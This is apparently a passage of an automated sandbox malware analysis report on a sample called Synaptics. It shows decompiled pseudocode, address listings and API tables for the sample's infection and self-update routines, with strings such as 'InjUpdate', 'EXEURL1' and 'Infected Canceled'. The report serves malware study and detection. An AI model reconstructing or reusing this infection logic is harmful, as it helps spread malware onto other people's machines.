							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							E00472EF0( &_v84, _t192, _t210, 0);
							E00404DCC(_v84, 0x498230);
							if(0 == 0) {
								_t112 =  *0x49f1dc; // 0x80356
								_t113 = E00473490(_t112, _t192, "InjUpdate", _v12, __eflags, 0, 0);
								__eflags = _t113;
								if(_t113 != 0) {
									E0045A800();
								}
							} else {
								_t119 =  *0x49f1dc; // 0x80356
								if(E00473490(_t119, _t192, "InjUpdate", _v12, 0, 0, _t192) == 0) {
									_t121 =  *0x49f1dc; // 0x80356
									_t122 = E00473490(_t121, _t192, "InjUpdate", _v12, __eflags, 0, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										E0045A800();
									}
								} else {
									E0045A800();
								}
							}
							_pop(_t243);
							 *[fs:eax] = _t243;
							_pop(_t244);
							 *[fs:eax] = _t244;
							goto L44;
						}
					}
					_t191 = E00430158(_v8, 1);
					 *((intOrPtr*)( *_t191))( &_v48, 0);
					_t249 =  *0x49f1c8; // 0x21e0774
					E004758E8(_v48, _t191,  &_v44, _t249);
					E00404A14(0x49f1c8, _v44);
					 *((intOrPtr*)( *_t191))( &_v56, 0);
					_t252 =  *0x49f15c; // 0x21e2fec
					E004758E8(_v56, _t191,  &_v52, _t252);
					E00404A14(0x49f15c, _v52);
					 *((intOrPtr*)( *_t191))( &_v64, 0);
					_t255 =  *0x49f168; // 0x21e30f4
					E004758E8(_v64, _t191,  &_v60, _t255);
					E00404A14(0x49f168, _v60);
					 *((intOrPtr*)( *_t191))( &_v72, 0);
					_t258 =  *0x49f16c; // 0x21e314c
					E004758E8(_v72, _t191,  &_v68, _t258);
					E00404A14(0x49f168, _v68);
					_t267 =  *_t191;
					 *((intOrPtr*)( *_t191))( &_v80, 0);
					_t261 =  *0x49f170; // 0x21e3198
					E004758E8(_v80, _t191,  &_v76, _t261);
					E00404A14(0x49f168, _v76);
					_t172 =  *0x49f15c; // 0x21e2fec
					_t173 = E00409628(_t172, _t273, _t280);
					_t174 =  *0x49f140; // 0x21e2a8c
					E004957B4(_t174, _t173);
					_t176 =  *0x49f1c8; // 0x21e0774
					_t281 = E00409628(_t176, _t273, _t280) -  *0x49f14c; // 0x6a
					if(_t281 <= 0) {
						_t178 =  *0x49f13c; // 0x21e2354
						E004967D4(_t178, _t191, 0x4981ec);
					} else {
						_v21 = 1;
					}
					E00403BEC(_t191);
					E00409BAC(_v8);
					_pop(_t265);
					_pop(_t210);
					 *[fs:eax] = _t265;
					goto L18;
				}
			}


































































                                                                                                                                                                                                                            0x00497cf0
                                                                                                                                                                                                                            0x00497cf0
                                                                                                                                                                                                                            0x00497cf0
                                                                                                                                                                                                                            0x00497cf0
                                                                                                                                                                                                                            0x00497cf1
                                                                                                                                                                                                                            0x00497cf3
                                                                                                                                                                                                                            0x00497cf8
                                                                                                                                                                                                                            0x00497cf8
                                                                                                                                                                                                                            0x00497cfa
                                                                                                                                                                                                                            0x00497cfc
                                                                                                                                                                                                                            0x00497cfc
                                                                                                                                                                                                                            0x00497cff
                                                                                                                                                                                                                            0x00497d00
                                                                                                                                                                                                                            0x00497d01
                                                                                                                                                                                                                            0x00497d04
                                                                                                                                                                                                                            0x00497d05
                                                                                                                                                                                                                            0x00497d0a
                                                                                                                                                                                                                            0x00497d0d
                                                                                                                                                                                                                            0x00497d15
                                                                                                                                                                                                                            0x00497d1d
                                                                                                                                                                                                                            0x00497d22
                                                                                                                                                                                                                            0x00497d25
                                                                                                                                                                                                                            0x00497d32
                                                                                                                                                                                                                            0x00497d37
                                                                                                                                                                                                                            0x00497d3a
                                                                                                                                                                                                                            0x00497d47
                                                                                                                                                                                                                            0x00497d4f
                                                                                                                                                                                                                            0x00497d54
                                                                                                                                                                                                                            0x00497d57
                                                                                                                                                                                                                            0x00497d64
                                                                                                                                                                                                                            0x00497d69
                                                                                                                                                                                                                            0x00497d6c
                                                                                                                                                                                                                            0x00497d79
                                                                                                                                                                                                                            0x00497d7e
                                                                                                                                                                                                                            0x00497d89
                                                                                                                                                                                                                            0x0049811b
                                                                                                                                                                                                                            0x0049811d
                                                                                                                                                                                                                            0x00498120
                                                                                                                                                                                                                            0x00498123
                                                                                                                                                                                                                            0x00498130
                                                                                                                                                                                                                            0x00498138
                                                                                                                                                                                                                            0x0049814a
                                                                                                                                                                                                                            0x00497d8f
                                                                                                                                                                                                                            0x00497d8f
                                                                                                                                                                                                                            0x00497d96
                                                                                                                                                                                                                            0x00497d99
                                                                                                                                                                                                                            0x00497d9a
                                                                                                                                                                                                                            0x00497da7
                                                                                                                                                                                                                            0x00497dad
                                                                                                                                                                                                                            0x00497d9c
                                                                                                                                                                                                                            0x00497d9c
                                                                                                                                                                                                                            0x00497d9d
                                                                                                                                                                                                                            0x00497db7
                                                                                                                                                                                                                            0x00497dbd
                                                                                                                                                                                                                            0x00497d9f
                                                                                                                                                                                                                            0x00497da0
                                                                                                                                                                                                                            0x00497dc7
                                                                                                                                                                                                                            0x00497dcd
                                                                                                                                                                                                                            0x00497dcd
                                                                                                                                                                                                                            0x00497da0
                                                                                                                                                                                                                            0x00497d9d
                                                                                                                                                                                                                            0x00497dd4
                                                                                                                                                                                                                            0x00497dd5
                                                                                                                                                                                                                            0x00497dda
                                                                                                                                                                                                                            0x00497ddd
                                                                                                                                                                                                                            0x00497de5
                                                                                                                                                                                                                            0x00497dea
                                                                                                                                                                                                                            0x00497df5
                                                                                                                                                                                                                            0x00497dfa
                                                                                                                                                                                                                            0x00497dfc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497f72
                                                                                                                                                                                                                            0x00497f77
                                                                                                                                                                                                                            0x00497f7e
                                                                                                                                                                                                                            0x00497f81
                                                                                                                                                                                                                            0x00497f90
                                                                                                                                                                                                                            0x00497f93
                                                                                                                                                                                                                            0x00497f97
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497f9d
                                                                                                                                                                                                                            0x00497f9d
                                                                                                                                                                                                                            0x00497fa1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497fa7
                                                                                                                                                                                                                            0x00497fae
                                                                                                                                                                                                                            0x00497fb1
                                                                                                                                                                                                                            0x00497fb2
                                                                                                                                                                                                                            0x00497fbf
                                                                                                                                                                                                                            0x00497fc5
                                                                                                                                                                                                                            0x00497fb4
                                                                                                                                                                                                                            0x00497fb4
                                                                                                                                                                                                                            0x00497fb5
                                                                                                                                                                                                                            0x00497fcf
                                                                                                                                                                                                                            0x00497fd5
                                                                                                                                                                                                                            0x00497fb7
                                                                                                                                                                                                                            0x00497fb8
                                                                                                                                                                                                                            0x00497fdf
                                                                                                                                                                                                                            0x00497fe5
                                                                                                                                                                                                                            0x00497fe5
                                                                                                                                                                                                                            0x00497fb8
                                                                                                                                                                                                                            0x00497fb5
                                                                                                                                                                                                                            0x00497fec
                                                                                                                                                                                                                            0x00497fed
                                                                                                                                                                                                                            0x00497ff2
                                                                                                                                                                                                                            0x00497ff5
                                                                                                                                                                                                                            0x00497ffd
                                                                                                                                                                                                                            0x00498002
                                                                                                                                                                                                                            0x00498014
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004980fc
                                                                                                                                                                                                                            0x004980fe
                                                                                                                                                                                                                            0x004980ff
                                                                                                                                                                                                                            0x0049810e
                                                                                                                                                                                                                            0x00498111
                                                                                                                                                                                                                            0x00498115
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00498115
                                                                                                                                                                                                                            0x0049801c
                                                                                                                                                                                                                            0x00498021
                                                                                                                                                                                                                            0x0049802d
                                                                                                                                                                                                                            0x00498033
                                                                                                                                                                                                                            0x0049803a
                                                                                                                                                                                                                            0x00498040
                                                                                                                                                                                                                            0x00498040
                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x00498044
                                                                                                                                                                                                                            0x00498045
                                                                                                                                                                                                                            0x0049804a
                                                                                                                                                                                                                            0x0049804d
                                                                                                                                                                                                                            0x00498053
                                                                                                                                                                                                                            0x00498060
                                                                                                                                                                                                                            0x00498065
                                                                                                                                                                                                                            0x004980c2
                                                                                                                                                                                                                            0x004980c7
                                                                                                                                                                                                                            0x004980cc
                                                                                                                                                                                                                            0x004980ce
                                                                                                                                                                                                                            0x004980d7
                                                                                                                                                                                                                            0x004980d7
                                                                                                                                                                                                                            0x00498067
                                                                                                                                                                                                                            0x00498072
                                                                                                                                                                                                                            0x0049807e
                                                                                                                                                                                                                            0x0049809a
                                                                                                                                                                                                                            0x0049809f
                                                                                                                                                                                                                            0x004980a4
                                                                                                                                                                                                                            0x004980a6
                                                                                                                                                                                                                            0x004980af
                                                                                                                                                                                                                            0x004980af
                                                                                                                                                                                                                            0x00498080
                                                                                                                                                                                                                            0x00498087
                                                                                                                                                                                                                            0x00498087
                                                                                                                                                                                                                            0x0049807e
                                                                                                                                                                                                                            0x004980de
                                                                                                                                                                                                                            0x004980e1
                                                                                                                                                                                                                            0x004980f2
                                                                                                                                                                                                                            0x004980f5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004980f5
                                                                                                                                                                                                                            0x00497f97
                                                                                                                                                                                                                            0x00497e11
                                                                                                                                                                                                                            0x00497e27
                                                                                                                                                                                                                            0x00497e2f
                                                                                                                                                                                                                            0x00497e35
                                                                                                                                                                                                                            0x00497e42
                                                                                                                                                                                                                            0x00497e5b
                                                                                                                                                                                                                            0x00497e63
                                                                                                                                                                                                                            0x00497e69
                                                                                                                                                                                                                            0x00497e76
                                                                                                                                                                                                                            0x00497e8f
                                                                                                                                                                                                                            0x00497e97
                                                                                                                                                                                                                            0x00497e9d
                                                                                                                                                                                                                            0x00497eaa
                                                                                                                                                                                                                            0x00497ec3
                                                                                                                                                                                                                            0x00497ecb
                                                                                                                                                                                                                            0x00497ed1
                                                                                                                                                                                                                            0x00497ede
                                                                                                                                                                                                                            0x00497ef5
                                                                                                                                                                                                                            0x00497ef7
                                                                                                                                                                                                                            0x00497eff
                                                                                                                                                                                                                            0x00497f05
                                                                                                                                                                                                                            0x00497f12
                                                                                                                                                                                                                            0x00497f17
                                                                                                                                                                                                                            0x00497f1c
                                                                                                                                                                                                                            0x00497f23
                                                                                                                                                                                                                            0x00497f28
                                                                                                                                                                                                                            0x00497f2d
                                                                                                                                                                                                                            0x00497f37
                                                                                                                                                                                                                            0x00497f3d
                                                                                                                                                                                                                            0x00497f4a
                                                                                                                                                                                                                            0x00497f4f
                                                                                                                                                                                                                            0x00497f3f
                                                                                                                                                                                                                            0x00497f3f
                                                                                                                                                                                                                            0x00497f3f
                                                                                                                                                                                                                            0x00497f56
                                                                                                                                                                                                                            0x00497f5e
                                                                                                                                                                                                                            0x00497f65
                                                                                                                                                                                                                            0x00497f67
                                                                                                                                                                                                                            0x00497f68
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497f68

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Sleep.KERNEL32(0000EA60,00000000,0049814B,?,?,?,?,00000000,00000000), ref: 00497D15
                                                                                                                                                                                                                              • Part of subcall function 00473490: ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                                                                                                                                                                                              • Part of subcall function 00473490: WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564,?,00000000), ref: 00473536
                                                                                                                                                                                                                              • Part of subcall function 0045A800: PostQuitMessage.USER32(00000000), ref: 0045A80B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExecuteMessageObjectPostQuitShellSingleSleepWait
                                                                                                                                                                                                                            • String ID: .exe$.ini$EXEURL1$InjUpdate$PORT$VER
                                                                                                                                                                                                                            • API String ID: 1631069871-204213252
                                                                                                                                                                                                                            • Opcode ID: 55b519f68e2bb60c12d9a59471a109a20816d433321419680486cc4de4f5ceb1
                                                                                                                                                                                                                            • Instruction ID: 45283d241bb881e06991861ba9452227acefdf6b6ef9343d0a562746dac06cd8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55b519f68e2bb60c12d9a59471a109a20816d433321419680486cc4de4f5ceb1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BC15130604108DFDF10EB69D852A9E7BB5EB96304F61847BE500E7391DB38AD0ACB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004776D4 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                            			E004776D4(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				void* __ecx;
				void* _t95;
				char _t96;
				struct HINSTANCE__* _t106;
				struct HINSTANCE__* _t107;
				struct HINSTANCE__* _t109;
				void* _t112;
				struct HINSTANCE__* _t113;
				struct HINSTANCE__* _t132;
				intOrPtr _t156;
				intOrPtr _t180;
				intOrPtr _t191;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t210;

				_t203 = __esi;
				_t202 = __edi;
				_t205 = _t206;
				_t156 = 7;
				do {
					_push(0);
					_push(0);
					_t156 = _t156 - 1;
				} while (_t156 != 0);
				_push(_t156);
				_t1 =  &_v8;
				 *_t1 = _t156;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v12);
				E00404E70(_v16);
				_push(_t205);
				_push(0x4778dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t206;
				if( *((intOrPtr*)( *_v8 + 0x14))() - 1 < 0) {
					L13:
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(E004778E4);
					E004049E4( &_v68, 0xb);
					return E004049E4( &_v16, 2);
				}
				_t95 =  *((intOrPtr*)( *_v8 + 0x14))() - 1;
				if(_t95 < 0) {
					goto L13;
				}
				_t96 = _t95 + 1;
				_t210 = _t96;
				_v24 = _t96;
				_v20 = 0;
				do {
					 *((intOrPtr*)( *_v8 + 0xc))();
					if(E00409A48(_v28, _t210) != 0) {
						 *[fs:eax] = _t206;
						_t146 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x47789f, _t205);
						_t106 = LoadLibraryA(E00404E80(_v32)); // executed
						 *0x49ec78 = _t106;
						_t107 =  *0x49ec78; // 0x3c30000
						if(E004770E4(_t107,  *_v8, _v16, _t202, _t203) != 0) {
							_t109 =  *0x49ec78; // 0x3c30000
							E0047717C(_t109, _t146,  &_v48, _v16, _t202, _t203);
							_t112 = E00409628(_v48, _t205, __eflags);
							__eflags = _t112 - _a8;
							if(_t112 >= _a8) {
								_t113 =  *0x49ec78; // 0x3c30000
								FreeLibrary(_t113);
								 *((intOrPtr*)( *_v8 + 0xc))();
								E00404CCC( &_v64, _v68, "Infected Canceled -> ");
								 *((intOrPtr*)( *_v8 + 0x20))();
							} else {
								 *((intOrPtr*)( *_v8 + 0xc))();
								E004774A8(_v52,  *_v8, _v12, _t202, _t203, 1);
								 *((intOrPtr*)( *_v8 + 0xc))();
								E00404CCC( &_v56, _v60, "Vrs Updated -> ");
								 *((intOrPtr*)( *_v8 + 0x20))();
							}
						} else {
							_t132 =  *0x49ec78; // 0x3c30000
							FreeLibrary(_t132); // executed
							 *((intOrPtr*)( *_v8 + 0xc))();
							E004774A8(_v36,  *_v8, _v12, _t202, _t203, 0); // executed
							 *((intOrPtr*)( *_v8 + 0xc))();
							E00404CCC( &_v40, _v44, "Completed -> ");
							 *((intOrPtr*)( *_v8 + 0x20))();
						}
						_pop(_t191);
						 *[fs:eax] = _t191;
					}
					_v20 = _v20 + 1;
					_t75 =  &_v24;
					 *_t75 = _v24 - 1;
				} while ( *_t75 != 0);
				goto L13;
			}


































                                                                                                                                                                                                                            0x004776d4
                                                                                                                                                                                                                            0x004776d4
                                                                                                                                                                                                                            0x004776d5
                                                                                                                                                                                                                            0x004776d8
                                                                                                                                                                                                                            0x004776dd
                                                                                                                                                                                                                            0x004776dd
                                                                                                                                                                                                                            0x004776df
                                                                                                                                                                                                                            0x004776e1
                                                                                                                                                                                                                            0x004776e1
                                                                                                                                                                                                                            0x004776e4
                                                                                                                                                                                                                            0x004776e5
                                                                                                                                                                                                                            0x004776e5
                                                                                                                                                                                                                            0x004776e8
                                                                                                                                                                                                                            0x004776e9
                                                                                                                                                                                                                            0x004776ea
                                                                                                                                                                                                                            0x004776eb
                                                                                                                                                                                                                            0x004776ee
                                                                                                                                                                                                                            0x004776f1
                                                                                                                                                                                                                            0x004776f7
                                                                                                                                                                                                                            0x004776ff
                                                                                                                                                                                                                            0x00477706
                                                                                                                                                                                                                            0x00477707
                                                                                                                                                                                                                            0x0047770c
                                                                                                                                                                                                                            0x0047770f
                                                                                                                                                                                                                            0x0047771b
                                                                                                                                                                                                                            0x004778b5
                                                                                                                                                                                                                            0x004778b7
                                                                                                                                                                                                                            0x004778ba
                                                                                                                                                                                                                            0x004778bd
                                                                                                                                                                                                                            0x004778ca
                                                                                                                                                                                                                            0x004778dc
                                                                                                                                                                                                                            0x004778dc
                                                                                                                                                                                                                            0x00477729
                                                                                                                                                                                                                            0x0047772c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00477732
                                                                                                                                                                                                                            0x00477732
                                                                                                                                                                                                                            0x00477733
                                                                                                                                                                                                                            0x00477736
                                                                                                                                                                                                                            0x0047773d
                                                                                                                                                                                                                            0x00477748
                                                                                                                                                                                                                            0x00477755
                                                                                                                                                                                                                            0x00477766
                                                                                                                                                                                                                            0x00477772
                                                                                                                                                                                                                            0x00477774
                                                                                                                                                                                                                            0x00477780
                                                                                                                                                                                                                            0x00477785
                                                                                                                                                                                                                            0x0047778d
                                                                                                                                                                                                                            0x00477799
                                                                                                                                                                                                                            0x004777fb
                                                                                                                                                                                                                            0x00477800
                                                                                                                                                                                                                            0x00477808
                                                                                                                                                                                                                            0x0047780d
                                                                                                                                                                                                                            0x00477810
                                                                                                                                                                                                                            0x0047785e
                                                                                                                                                                                                                            0x00477864
                                                                                                                                                                                                                            0x00477874
                                                                                                                                                                                                                            0x00477882
                                                                                                                                                                                                                            0x00477892
                                                                                                                                                                                                                            0x00477812
                                                                                                                                                                                                                            0x0047781f
                                                                                                                                                                                                                            0x0047782b
                                                                                                                                                                                                                            0x0047783b
                                                                                                                                                                                                                            0x00477849
                                                                                                                                                                                                                            0x00477859
                                                                                                                                                                                                                            0x00477859
                                                                                                                                                                                                                            0x0047779b
                                                                                                                                                                                                                            0x0047779b
                                                                                                                                                                                                                            0x004777a1
                                                                                                                                                                                                                            0x004777b3
                                                                                                                                                                                                                            0x004777bf
                                                                                                                                                                                                                            0x004777cf
                                                                                                                                                                                                                            0x004777dd
                                                                                                                                                                                                                            0x004777ed
                                                                                                                                                                                                                            0x004777ed
                                                                                                                                                                                                                            0x00477897
                                                                                                                                                                                                                            0x0047789a
                                                                                                                                                                                                                            0x0047789a
                                                                                                                                                                                                                            0x004778a9
                                                                                                                                                                                                                            0x004778ac
                                                                                                                                                                                                                            0x004778ac
                                                                                                                                                                                                                            0x004778ac
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,00000000,00000006,00000000,00000000,004967CC,?,00498487,00000001,0000006A,?,00000000), ref: 00477780
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(03C30000,00000000,?,?,?,?,00000000,00000006,00000000,00000000,004967CC,?,00498487,00000001,0000006A), ref: 004777A1
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(03C30000,00000000,?,?,?,?,00000000,00000006,00000000,00000000,004967CC,?,00498487,00000001,0000006A), ref: 00477864
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Free$Load
                                                                                                                                                                                                                            • String ID: Completed -> $Infected Canceled -> $Vrs Updated ->
                                                                                                                                                                                                                            • API String ID: 2391024519-3592865843
                                                                                                                                                                                                                            • Opcode ID: 20c501d661f2755b7fe8a39ab36196b97aea8b016f3c9e4efb946257bbdf6581
                                                                                                                                                                                                                            • Instruction ID: 17185f43945d3bc0c2e5cc5bb4bd267fdef97e65ffff577caacc568d39ef9c26
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20c501d661f2755b7fe8a39ab36196b97aea8b016f3c9e4efb946257bbdf6581
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32611878A04209DFDB04EFA5C8849EEB7B5FF48300F6180A6E904A7351CB34AE05CF65
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004587A4 Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E004587A4(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x49ebb8 != 0) {
					_t54 =  *0x49ebb8; // 0x21e1714
					_t2 = _t54 + 0x88; // 0x1
					_v5 =  *_t2;
				}
				_push(_t74);
				_push(0x4588e9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x49ebb8 != 0) {
					_t52 =  *0x49ebb8; // 0x21e1714
					E0045AD24(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E00424FCC( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E00424FCC( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E004250B0( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E00424FCC( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E00424FCC( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E00424FCC( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E00424E10( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E00424E10( *_t17, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x4588f0);
				if( *0x49ebb8 != 0) {
					_t38 =  *0x49ebb8; // 0x21e1714
					return E0045AD24(_t38, _v5);
				}
				return 0;
			}






















                                                                                                                                                                                                                            0x004587a4
                                                                                                                                                                                                                            0x004587a5
                                                                                                                                                                                                                            0x004587a7
                                                                                                                                                                                                                            0x004587ae
                                                                                                                                                                                                                            0x004587b0
                                                                                                                                                                                                                            0x004587bb
                                                                                                                                                                                                                            0x004587bd
                                                                                                                                                                                                                            0x004587c2
                                                                                                                                                                                                                            0x004587c8
                                                                                                                                                                                                                            0x004587c8
                                                                                                                                                                                                                            0x004587cd
                                                                                                                                                                                                                            0x004587ce
                                                                                                                                                                                                                            0x004587d3
                                                                                                                                                                                                                            0x004587d6
                                                                                                                                                                                                                            0x004587e0
                                                                                                                                                                                                                            0x004587e4
                                                                                                                                                                                                                            0x004587e9
                                                                                                                                                                                                                            0x004587e9
                                                                                                                                                                                                                            0x004587ff
                                                                                                                                                                                                                            0x0045881b
                                                                                                                                                                                                                            0x00458822
                                                                                                                                                                                                                            0x00458828
                                                                                                                                                                                                                            0x00458801
                                                                                                                                                                                                                            0x00458805
                                                                                                                                                                                                                            0x0045880c
                                                                                                                                                                                                                            0x00458812
                                                                                                                                                                                                                            0x00458812
                                                                                                                                                                                                                            0x0045882d
                                                                                                                                                                                                                            0x00458844
                                                                                                                                                                                                                            0x0045884b
                                                                                                                                                                                                                            0x00458881
                                                                                                                                                                                                                            0x0045888c
                                                                                                                                                                                                                            0x00458893
                                                                                                                                                                                                                            0x0045889a
                                                                                                                                                                                                                            0x004588a0
                                                                                                                                                                                                                            0x0045884d
                                                                                                                                                                                                                            0x00458854
                                                                                                                                                                                                                            0x0045885b
                                                                                                                                                                                                                            0x00458861
                                                                                                                                                                                                                            0x0045886d
                                                                                                                                                                                                                            0x00458874
                                                                                                                                                                                                                            0x0045887a
                                                                                                                                                                                                                            0x0045887a
                                                                                                                                                                                                                            0x004588a5
                                                                                                                                                                                                                            0x004588b0
                                                                                                                                                                                                                            0x004588b5
                                                                                                                                                                                                                            0x004588c0
                                                                                                                                                                                                                            0x004588ca
                                                                                                                                                                                                                            0x004588cd
                                                                                                                                                                                                                            0x004588d9
                                                                                                                                                                                                                            0x004588de
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004588e3
                                                                                                                                                                                                                            0x004588e8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004587F8
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00458805
                                                                                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 0045881B
                                                                                                                                                                                                                              • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00458844
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00458854
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 0045886D
                                                                                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 00458893
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2891467149-0
